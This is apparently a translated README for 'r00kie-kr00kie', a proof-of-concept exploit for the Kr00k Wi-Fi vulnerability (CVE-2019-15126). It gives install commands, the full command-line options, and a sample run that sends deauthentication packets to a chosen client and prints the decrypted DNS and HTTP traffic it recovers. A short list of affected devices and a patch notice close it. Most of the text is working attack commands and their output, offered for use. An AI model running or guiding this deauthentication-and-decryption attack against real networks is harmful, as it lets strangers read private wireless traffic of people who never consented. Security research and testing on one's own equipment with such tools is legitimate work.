Kr00k is a vulnerability in Broadcom and Cypress Wi-Fi chips. An attacker who exploits it can partially decrypt WPA2-encrypted traffic and read the data carried in wireless packets. Because Broadcom and Cypress Wi-Fi chips are widely used in phones, tablets, laptops and IoT devices, initial estimates put the number of affected devices at more than one billion.

To use these scripts you need a Wi-Fi card that supports active monitor mode and frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n), which is what we used to develop and test the code. This PoC has been tested on Kali Linux.
Installation

```
# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt
```
Usage

This is the main exploit file that implements the kr00k attack:

```
->~:python3 r00kie-kr00kie.py -h
usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID] [-c CLIENT]
                         [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY] [-p PCAP_PATH_READ]
                         [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Set wireless interface name for listen packets
  -l CHANNEL, --channel CHANNEL
                        Set channel for wireless interface (default: 1)
  -b BSSID, --bssid BSSID
                        Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
  -c CLIENT, --client CLIENT
                        Set WiFi client MAC address (example: "01:23:45:67:89:0b")
  -n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
                        Set number of deauth packets for one iteration (default: 5)
  -d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
                        Set delay between sending deauth packets (default: 5)
  -p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
                        Set path to PCAP file for read encrypted packets
  -r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
                        Set path to PCAP file for write decrypted packets
  -q, --quiet           Minimal output
```
To launch the attack you need to know the access point's BSSID, its channel and the victim's MAC address; all three can be found with airodump-ng wlan0.

Run the exploit:
```
->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

v0.0.1 https://hexway.io/research/r00kie-kr00kie/

[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 30074
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xcce1
     src       = 192.168.43.161
     dst       = 8.8.4.4
     \options   \
###[ UDP ]###
        sport     = 60744
        dport     = domain
        len       = 40
        chksum    = 0xa649
###[ DNS ]###
           id        = 55281
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]###
            |  qname     = 'g.whatsapp.net.'
            |  qtype     = A
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 30075
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = 0xcce0
     src       = 192.168.43.161
     dst       = 8.8.4.4
     \options   \
###[ UDP ]###
        sport     = 60744
        dport     = domain
        len       = 40
        chksum    = 0x104b
###[ DNS ]###
           id        = 28117
           qr        = 0
           opcode    = QUERY
           aa        = 0
           tc        = 0
           rd        = 1
           ra        = 0
           z         = 0
           ad        = 0
           cd        = 0
           rcode     = ok
           qdcount   = 1
           ancount   = 0
           nscount   = 0
           arcount   = 0
           \qd        \
            |###[ DNS Question Record ]###
            |  qname     = 'g.whatsapp.net.'
            |  qtype     = AAAA
            |  qclass    = IN
           an        = None
           ns        = None
           ar        = None
```
In addition, if traffic was already captured (as a pcap file) during a kr00k attack, it can be decrypted afterwards:
```
->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

v0.0.1 https://hexway.io/research/r00kie-kr00kie/

[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 490
     id        = 756
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0xd0ca
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 34789
        dport     = 1337
        seq       = 3463744441
        ack       = 3909086929
        dataofs   = 8
        reserved  = 0
        flags     = PA
        window    = 1369
        chksum    = 0x65ee
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
           load      = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 42533
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x2f47
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 34792
        dport     = 1337
        seq       = 71773087
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 65535
        chksum    = 0x97df
        urgptr    = 0
        options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 1460
     id        = 35150
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x46a6
     src       = 192.168.43.161
     dst       = 1.1.1.1
     \options   \
###[ TCP ]###
        sport     = 36020
        dport     = 1337
        seq       = 395101552
        ack       = 1111748198
        dataofs   = 8
        reserved  = 0
        flags     = A
        window    = 1369
        chksum    = 0x35d2
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
           load      = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"
[+] Got a kr00ked packet:
###[ Ethernet ]###
  dst       = d4:38:9c:82:23:7a
  src       = 88:c9:d0:fb:88:d1
  type      = IPv4
###[ IP ]###
     version   = 4
     ihl       = 5
     tos       = 0x0
     len       = 60
     id        = 17897
     flags     = DF
     frag      = 0
     ttl       = 64
     proto     = tcp
     chksum    = 0x8f83
     src       = 192.168.43.161
     dst       = 95.85.25.177
     \options   \
###[ TCP ]###
        sport     = 36266
        dport     = 1337
        seq       = 3375779416
        ack       = 0
        dataofs   = 10
        reserved  = 0
        flags     = S
        window    = 65535
        chksum    = 0x2c7d
        urgptr    = 0
        options   = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]
[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap
```
This UDP script is run on the victim side to generate the traffic used to demonstrate the kr00k attack:

```
->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit
```

The following devices are affected by the Kr00k vulnerability:
· Amazon Echo 2
· Amazon Kindle 8
· Apple iPad mini 2
· Apple iPhone 6, 6S, 8, XR
· Apple MacBook Air Retina 13-inch 2018
· Google Nexus 5
· Google Nexus 6
· Google Nexus 6S
· Raspberry Pi 3
· Samsung Galaxy S4 GT-I9505
· Samsung Galaxy S8
· Xiaomi Redmi 3S
· Asus RT-N12
· Huawei B612S-25d
· Huawei EchoLife HG8245H
· Huawei E5577Cs-321
Broadcom and Cypress have released firmware patches to the affected vendors; users are advised to install the relevant updates as soon as possible.

This article is translated from: https://www.kitploit.com/2020/03/r00kie-kr00kie-poc-exploit-for-cve-2019.html . If reposting, please credit the original source.